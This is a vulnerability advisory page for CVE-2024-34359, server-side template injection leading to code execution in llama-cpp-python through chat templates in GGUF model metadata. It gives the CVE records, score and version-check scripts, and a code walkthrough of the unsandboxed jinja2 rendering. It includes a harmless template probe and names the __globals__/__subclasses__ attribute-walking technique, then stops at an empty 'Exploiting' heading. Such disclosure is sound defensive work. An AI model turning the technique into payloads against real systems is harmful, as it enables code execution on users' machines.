Vulnerability-Lookup

CVE-2024-34359 (GCVE-0-2024-34359)

Vulnerability from cvelistv5 – Published: 2024-05-10 17:07 – Updated: 2024-08-02 02:51

Title

llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata

Summary

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on the `Llama` class in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `Llama` constructor, `__init__`, takes several parameters that configure how the model is loaded and run. Besides NUMA and LoRA settings, tokenizer loading, and hardware settings, `__init__` also loads the `chat template` from the target `.gguf` file's metadata and passes it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for the model. However, `Jinja2ChatFormatter` parses the `chat template` from the metadata with an unsandboxed `jinja2.Environment`, and the template is then rendered in `__call__` to construct the interaction `prompt`. This allows `jinja2` Server-Side Template Injection, which leads to remote code execution through a carefully constructed payload.

Severity

9.7 (Critical)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
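
The vector string can be turned back into a number with the CVSS v3.1 base-score equations. The sketch below is a minimal illustration, not an official calculator: the function and table names are made up for this example, and only base metrics are handled. Under these equations the vector above evaluates to 9.6, the figure reported in the NVD and GHSA data further down this page, while the CNA container lists 9.7.

```python
import math

# Metric weights from the CVSS v3.1 specification (base metrics only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required is weighted differently when Scope is Changed.
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a 'CVSS:3.1/...' vector string."""
    parts = dict(item.split(":") for item in vector.split("/")[1:])
    changed = parts["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[parts["PR"]]

    # Impact sub-score.
    iss = 1 - (
        (1 - WEIGHTS["C"][parts["C"]])
        * (1 - WEIGHTS["I"][parts["I"]])
        * (1 - WEIGHTS["A"][parts["A"]])
    )
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss

    exploitability = (
        8.22
        * WEIGHTS["AV"][parts["AV"]]
        * WEIGHTS["AC"][parts["AC"]]
        * pr
        * WEIGHTS["UI"][parts["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"))
```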

CWE

CWE-76 - Improper Neutralization of Equivalent Special Elements

Assigner

GitHub_M

References

	URL	Tags
	https://github.com/abetlen/llama-cpp-python/secur…	x_refsource_CONFIRM
	https://github.com/abetlen/llama-cpp-python/commi…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	abetlen	llama-cpp-python	Affected: >= 0.2.30, <= 0.2.71
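
The affected range can be checked against an installed version string with a few lines of Python. This is a minimal sketch that assumes plain dotted numeric versions such as `0.2.71`; the helper names are hypothetical, and pre-release or local version suffixes are not handled.

```python
def parse_version(text: str) -> tuple[int, ...]:
    """Turn a dotted numeric version such as '0.2.71' into a comparable tuple."""
    return tuple(int(part) for part in text.split("."))


# Bounds taken from the "Impacted products" row above (both inclusive).
FIRST_AFFECTED = parse_version("0.2.30")
LAST_AFFECTED = parse_version("0.2.71")


def is_affected(installed: str) -> bool:
    """Return True when the version falls inside the affected range."""
    return FIRST_AFFECTED <= parse_version(installed) <= LAST_AFFECTED


print(is_affected("0.2.55"))
print(is_affected("0.2.72"))
```

Comparing integer tuples rather than raw strings matters here: as strings, `"0.2.9"` would sort after `"0.2.30"`.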

JSON

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:abetlen:llama-cpp-python:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "llama-cpp-python",
            "vendor": "abetlen",
            "versions": [
              {
                "lessThanOrEqual": "0.2.71",
                "status": "affected",
                "version": "0.2.30",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-34359",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-15T19:35:24.408358Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-06T18:29:15.313Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T02:51:10.739Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829"
          },
          {
            "name": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "llama-cpp-python",
          "vendor": "abetlen",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.2.30, \u003c= 0.2.71"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.7,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-76",
              "description": "CWE-76: Improper Neutralization of Equivalent Special Elements",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-05-10T17:07:18.850Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829"
        },
        {
          "name": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df"
        }
      ],
      "source": {
        "advisory": "GHSA-56xg-wfcc-g829",
        "discovery": "UNKNOWN"
      },
      "title": "llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-34359",
    "datePublished": "2024-05-10T17:07:18.850Z",
    "dateReserved": "2024-05-02T06:36:32.439Z",
    "dateUpdated": "2024-08-02T02:51:10.739Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "descriptions": "[{\"lang\": \"en\", \"value\": \"llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.\"}, {\"lang\": \"es\", \"value\": \"llama-cpp-python son los enlaces de Python para llama.cpp. `llama-cpp-python` depende de la clase `Llama` en `llama.py` para cargar `.gguf` llama.cpp o modelos de aprendizaje autom\\u00e1tico de latencia. El constructor `__init__` integrado en `Llama` toma varios par\\u00e1metros para configurar la carga y ejecuci\\u00f3n del modelo. Adem\\u00e1s de `NUMA, configuraci\\u00f3n de LoRa`, `carga de tokenizadores` y `configuraci\\u00f3n de hardware`, `__init__` tambi\\u00e9n carga la `plantilla de chat` desde los metadatos `.gguf` espec\\u00edficos y adem\\u00e1s la analiza en `llama_chat_format.Jinja2ChatFormatter.to_chat_handler ()` para construir el `self.chat_handler` para este modelo. Sin embargo, `Jinja2ChatFormatter` analiza la `plantilla de chat` dentro del Metadate con `jinja2.Environment` sin zona de pruebas, que adem\\u00e1s se representa en `__call__` para construir el `mensaje` de interacci\\u00f3n. 
Esto permite la inyecci\\u00f3n de plantilla del lado del servidor `jinja2`, lo que conduce a la ejecuci\\u00f3n remota de c\\u00f3digo mediante un payload cuidadosamente construida.\"}]",
      "id": "CVE-2024-34359",
      "lastModified": "2024-11-21T09:18:30.130",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\", \"baseScore\": 9.6, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 6.0}]}",
      "published": "2024-05-14T15:38:45.093",
      "references": "[{\"url\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Awaiting Analysis",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-76\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-34359\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-05-14T15:38:45.093\",\"lastModified\":\"2024-11-21T09:18:30.130\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.\"},{\"lang\":\"es\",\"value\":\"llama-cpp-python son los enlaces de Python para llama.cpp. `llama-cpp-python` depende de la clase `Llama` en `llama.py` para cargar `.gguf` llama.cpp o modelos de aprendizaje autom\u00e1tico de latencia. El constructor `__init__` integrado en `Llama` toma varios par\u00e1metros para configurar la carga y ejecuci\u00f3n del modelo. Adem\u00e1s de `NUMA, configuraci\u00f3n de LoRa`, `carga de tokenizadores` y `configuraci\u00f3n de hardware`, `__init__` tambi\u00e9n carga la `plantilla de chat` desde los metadatos `.gguf` espec\u00edficos y adem\u00e1s la analiza en `llama_chat_format.Jinja2ChatFormatter.to_chat_handler ()` para construir el `self.chat_handler` para este modelo. 
Sin embargo, `Jinja2ChatFormatter` analiza la `plantilla de chat` dentro del Metadate con `jinja2.Environment` sin zona de pruebas, que adem\u00e1s se representa en `__call__` para construir el `mensaje` de interacci\u00f3n. Esto permite la inyecci\u00f3n de plantilla del lado del servidor `jinja2`, lo que conduce a la ejecuci\u00f3n remota de c\u00f3digo mediante un payload cuidadosamente construida.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\",\"baseScore\":9.6,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-76\"}]}],\"references\":[{\"url\":\"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"name\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"name\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T02:51:10.739Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-34359\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-05-15T19:35:24.408358Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:abetlen:llama-cpp-python:*:*:*:*:*:*:*:*\"], \"vendor\": \"abetlen\", \"product\": \"llama-cpp-python\", \"versions\": [{\"status\": \"affected\", \"version\": \"0.2.30\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"0.2.71\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-05-15T19:53:45.656Z\"}}], \"cna\": {\"title\": \"llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata\", \"source\": {\"advisory\": \"GHSA-56xg-wfcc-g829\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 9.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": 
\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"abetlen\", \"product\": \"llama-cpp-python\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.2.30, \u003c= 0.2.71\"}]}], \"references\": [{\"url\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"name\": \"https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"name\": \"https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. 
This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-76\", \"description\": \"CWE-76: Improper Neutralization of Equivalent Special Elements\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-05-10T17:07:18.850Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-34359\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-08-02T02:51:10.739Z\", \"dateReserved\": \"2024-05-02T06:36:32.439Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-05-10T17:07:18.850Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-56XG-WFCC-G829

Vulnerability from github – Published: 2024-05-13 14:10 – Updated: 2024-05-20 22:24

Summary

llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata

Details

Description

llama-cpp-python depends on the Llama class in llama.py to load .gguf llama.cpp or Latency Machine Learning Models. The Llama constructor, __init__, takes several parameters that configure how the model is loaded and run. Besides NUMA and LoRA settings, tokenizer loading, and hardware settings, __init__ also loads the chat template from the target .gguf file's metadata and passes it to llama_chat_format.Jinja2ChatFormatter.to_chat_handler() to construct the self.chat_handler for the model. However, Jinja2ChatFormatter parses the chat template from the metadata with an unsandboxed jinja2.Environment, and the template is then rendered in __call__ to construct the interaction prompt. This allows jinja2 Server-Side Template Injection, which leads to RCE through a carefully constructed payload.

Source-to-Sink

`llama.py` -> `class Llama` -> `__init__`:

class Llama:
    """High-level Python wrapper for a llama.cpp model."""

    __backend_initialized = False

    def __init__(
        self,
        model_path: str,
        # many other parameters omitted for brevity
    ):

        self.verbose = verbose

        set_verbose(verbose)

        if not Llama.__backend_initialized:
            with suppress_stdout_stderr(disable=verbose):
                llama_cpp.llama_backend_init()
            Llama.__backend_initialized = True

        # ... unrelated code omitted ...

        try:
            self.metadata = self._model.metadata()
        except Exception as e:
            self.metadata = {}
            if self.verbose:
                print(f"Failed to load metadata: {e}", file=sys.stderr)

        if self.verbose:
            print(f"Model metadata: {self.metadata}", file=sys.stderr)

        if (
            self.chat_format is None
            and self.chat_handler is None
            and "tokenizer.chat_template" in self.metadata
        ):
            chat_format = llama_chat_format.guess_chat_format_from_gguf_metadata(
                self.metadata
            )

            if chat_format is not None:
                self.chat_format = chat_format
                if self.verbose:
                    print(f"Guessed chat format: {chat_format}", file=sys.stderr)
            else:
                template = self.metadata["tokenizer.chat_template"]
                try:
                    eos_token_id = int(self.metadata["tokenizer.ggml.eos_token_id"])
                except:
                    eos_token_id = self.token_eos()
                try:
                    bos_token_id = int(self.metadata["tokenizer.ggml.bos_token_id"])
                except:
                    bos_token_id = self.token_bos()

                eos_token = self._model.token_get_text(eos_token_id)
                bos_token = self._model.token_get_text(bos_token_id)

                if self.verbose:
                    print(f"Using gguf chat template: {template}", file=sys.stderr)
                    print(f"Using chat eos_token: {eos_token}", file=sys.stderr)
                    print(f"Using chat bos_token: {bos_token}", file=sys.stderr)

                self.chat_handler = llama_chat_format.Jinja2ChatFormatter(
                    template=template,
                    eos_token=eos_token,
                    bos_token=bos_token,
                    stop_token_ids=[eos_token_id],
                ).to_chat_handler()

        if self.chat_format is None and self.chat_handler is None:
            self.chat_format = "llama-2"
            if self.verbose:
                print(f"Using fallback chat format: {chat_format}", file=sys.stderr)

In llama.py, llama-cpp-python defines the fundamental class for model initialization (including NUMA and LoRA settings, tokenizer loading, and so on). Here we focus on the part that processes metadata. self.metadata is set during class initialization by calling the model's metadata() method. The constructor then checks that chat_format and chat_handler are both None and that the key tokenizer.chat_template exists in the self.metadata dictionary. If so, it tries to guess the chat format from the metadata. If the guess fails, it reads the value of tokenizer.chat_template directly from self.metadata and passes it to llama_chat_format.Jinja2ChatFormatter as the template parameter; the result of to_chat_handler() is then stored as self.chat_handler.
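
The branch structure described above can be condensed into a small predicate that says when the embedded template reaches Jinja2ChatFormatter. This is an illustrative sketch only: `uses_embedded_template` and its `guess_format` argument are hypothetical names standing in for the constructor logic and for `guess_chat_format_from_gguf_metadata`, and no llama-cpp-python code is called.

```python
from typing import Callable, Mapping, Optional

TEMPLATE_KEY = "tokenizer.chat_template"


def uses_embedded_template(
    metadata: Mapping[str, str],
    chat_format: Optional[str] = None,
    chat_handler: Optional[object] = None,
    guess_format: Callable[[Mapping[str, str]], Optional[str]] = lambda _m: None,
) -> bool:
    """Return True when the template from the metadata would be rendered.

    Mirrors the excerpt: the Jinja2 path is taken only if the caller supplied
    neither chat_format nor chat_handler, the metadata carries a template,
    and the format guess comes back empty.
    """
    if chat_format is not None or chat_handler is not None:
        return False
    if TEMPLATE_KEY not in metadata:
        return False
    return guess_format(metadata) is None


meta = {TEMPLATE_KEY: "{% for m in messages %}{{ m['content'] }}{% endfor %}"}
print(uses_embedded_template(meta))
print(uses_embedded_template(meta, chat_format="chatml"))
```

Reading the excerpt this way suggests that a model whose template is not recognized by the guess step, loaded with default arguments, is the case that reaches the template renderer. The advisory itself does not discuss passing an explicit chat_format as a mitigation, so treat that observation as an inference from the code shown.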

`llama_chat_format.py` -> `Jinja2ChatFormatter`:

self._environment = jinja2.Environment( -> from_string(self.template) -> self._environment.render(

class ChatFormatter(Protocol):
    """Base Protocol for a chat formatter. A chat formatter is a function that
    takes a list of messages and returns a chat format response which can be used
    to generate a completion. The response can also include a stop token or list
    of stop tokens to use for the completion."""

    def __call__(
        self,
        *,
        messages: List[llama_types.ChatCompletionRequestMessage],
        **kwargs: Any,
    ) -> ChatFormatterResponse: ...


class Jinja2ChatFormatter(ChatFormatter):
    def __init__(
        self,
        template: str,
        eos_token: str,
        bos_token: str,
        add_generation_prompt: bool = True,
        stop_token_ids: Optional[List[int]] = None,
    ):
        """A chat formatter that uses jinja2 templates to format the prompt."""
        self.template = template
        self.eos_token = eos_token
        self.bos_token = bos_token
        self.add_generation_prompt = add_generation_prompt
        self.stop_token_ids = set(stop_token_ids) if stop_token_ids is not None else None

        self._environment = jinja2.Environment(
            loader=jinja2.BaseLoader(),
            trim_blocks=True,
            lstrip_blocks=True,
        ).from_string(self.template)

    def __call__(
        self,
        *,
        messages: List[llama_types.ChatCompletionRequestMessage],
        functions: Optional[List[llama_types.ChatCompletionFunction]] = None,
        function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,
        tools: Optional[List[llama_types.ChatCompletionTool]] = None,
        tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,
        **kwargs: Any,
    ) -> ChatFormatterResponse:
        def raise_exception(message: str):
            raise ValueError(message)

        prompt = self._environment.render(
            messages=messages,
            eos_token=self.eos_token,
            bos_token=self.bos_token,
            raise_exception=raise_exception,
            add_generation_prompt=self.add_generation_prompt,
            functions=functions,
            function_call=function_call,
            tools=tools,
            tool_choice=tool_choice,
        )

As we can see in llama_chat_format.py -> Jinja2ChatFormatter, the constructor __init__ initializes the required members of the class. The part to focus on is this statement:

        self._environment = jinja2.Environment(
            loader=jinja2.BaseLoader(),
            trim_blocks=True,
            lstrip_blocks=True,
        ).from_string(self.template)

Notably, llama_cpp_python loads self.template (self.template = template, the chat template taken from the metadata and passed in as a parameter) directly via jinja2.Environment.from_string( without any sandboxing, rather than using the protected ImmutableSandboxedEnvironment class. This is extremely unsafe: an attacker can get llama_cpp_python to load a malicious chat template, which is then rendered in the __call__ method. Because jinja2's renderer evaluates embedded expressions much as eval() would, and exposed methods can be reached by walking attributes such as __globals__ and __subclasses__ of almost any object, this allows RCE or denial of service.

    def __call__(
        self,
        *,
        messages: List[llama_types.ChatCompletionRequestMessage],
        functions: Optional[List[llama_types.ChatCompletionFunction]] = None,
        function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,
        tools: Optional[List[llama_types.ChatCompletionTool]] = None,
        tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,
        **kwargs: Any,
    ) -> ChatFormatterResponse:
        def raise_exception(message: str):
            raise ValueError(message)

        prompt = self._environment.render( # rendered!
            messages=messages,
            eos_token=self.eos_token,
            bos_token=self.bos_token,
            raise_exception=raise_exception,
            add_generation_prompt=self.add_generation_prompt,
            functions=functions,
            function_call=function_call,
            tools=tools,
            tool_choice=tool_choice,
        )
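
The difference between the two environment classes can be seen with a harmless probe template. This is a minimal sketch that assumes the `jinja2` package is installed; the probe only reads a class name and runs no commands, and the helper names are hypothetical.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import ImmutableSandboxedEnvironment

# Harmless probe: walks from a tuple to the name of its base class.
PROBE = "{{ ().__class__.__base__.__name__ }}"


def render_unsandboxed(template: str) -> str:
    """Render with a plain Environment, as the vulnerable code path does."""
    return Environment().from_string(template).render()


def render_sandboxed(template: str) -> str:
    """Render with the sandboxed class named in the advisory text."""
    try:
        return ImmutableSandboxedEnvironment().from_string(template).render()
    except SecurityError as exc:
        return f"blocked: {exc}"


print(render_unsandboxed(PROBE))
print(render_sandboxed(PROBE))
```

In the plain environment the dunder attribute walk succeeds, whereas the sandbox refuses access to underscore-prefixed attributes and raises `SecurityError` once the template tries to use the result.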

Exploiting

